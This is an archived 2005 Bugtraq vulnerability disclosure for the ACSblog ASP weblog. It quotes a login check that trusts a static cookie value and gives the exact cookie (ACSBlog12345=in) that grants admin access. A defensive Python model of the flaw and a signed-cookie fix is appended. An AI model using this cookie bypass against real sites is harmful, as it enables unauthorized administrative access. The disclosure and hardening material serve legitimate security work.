
List:       bugtraq
Subject:    ACSblog bug
From:       farhad koosha <farhadkey () yahoo ! com>
Date:       2005-04-23 17:10:21
Message-ID: 20050423171021.17464.qmail () www ! securityfocus ! com



*/ WWW.BAHADORLOVER.COM \*

ACSblog :
An ASP weblog with manageable code blocks and logical structure that make it easy for the novice to get into the code and customize it to your site. Full-featured enough for expert bloggers.

vendor:www.asppress.com

Where is the bug ?

inc_login_check.asp 

<% if request.cookies(cookiename)="in" then
ihaveadminright=true
else
ihaveadminright=false
end if
%>

---------------

Default cookiename is "ACSBlog12345", and you can create a cookie or use HTTP headers -> ACSBlog12345=in

---------------

vulnerable versions:
0.8
1.0
1.0.1
1.0.2
1.0.3
1.1
1.1.2
1.1.3
Commercial Version

3NITRO : www.bahadorlover.com
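
The check quoted from inc_login_check.asp, modeled in Python beside a hardened form, as an added example that is not part of the original message or of ACSblog's code. The function names, the key, the session lifetime and the `user|issued|tag` cookie layout are assumptions made for illustration; only the cookie name and the value "in" come from the advisory.

```python
import hashlib
import hmac
import time

COOKIE_NAME = "ACSBlog12345"      # default cookie name quoted in the advisory
SECRET = b"constructed-demo-key"  # constructed; a real key is random and server-side only
MAX_AGE = 3600                    # assumed session lifetime in seconds


def legacy_is_admin(cookies):
    """Model of inc_login_check.asp: trusts a constant that the client can set."""
    return cookies.get(COOKIE_NAME) == "in"


def _mac(payload):
    return hmac.new(SECRET, payload.encode(), hashlib.sha256).hexdigest()


def issue_cookie(user, now=None):
    """Hypothetical login step: called only after the password check succeeds."""
    issued = int(time.time() if now is None else now)
    payload = f"{user}|{issued}"
    return f"{payload}|{_mac(payload)}"


def hardened_is_admin(cookies, now=None):
    """Accept the cookie only if the server's MAC verifies and it has not expired."""
    parts = cookies.get(COOKIE_NAME, "").split("|")
    if len(parts) != 3:
        return False  # covers the static value "in" and any malformed cookie
    user, issued, tag = parts
    expected = _mac(f"{user}|{issued}")
    # Constant-time comparison on bytes; a non-matching tag is rejected here.
    if not hmac.compare_digest(tag.encode(), expected.encode()):
        return False
    # The MAC verified, so "issued" is a value this server wrote.
    age = (time.time() if now is None else now) - int(issued)
    return 0 <= age <= MAX_AGE
```

In classic ASP the equivalent change is to keep the admin flag in server-side state (for example the `Session` object) instead of in a cookie value the browser controls.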

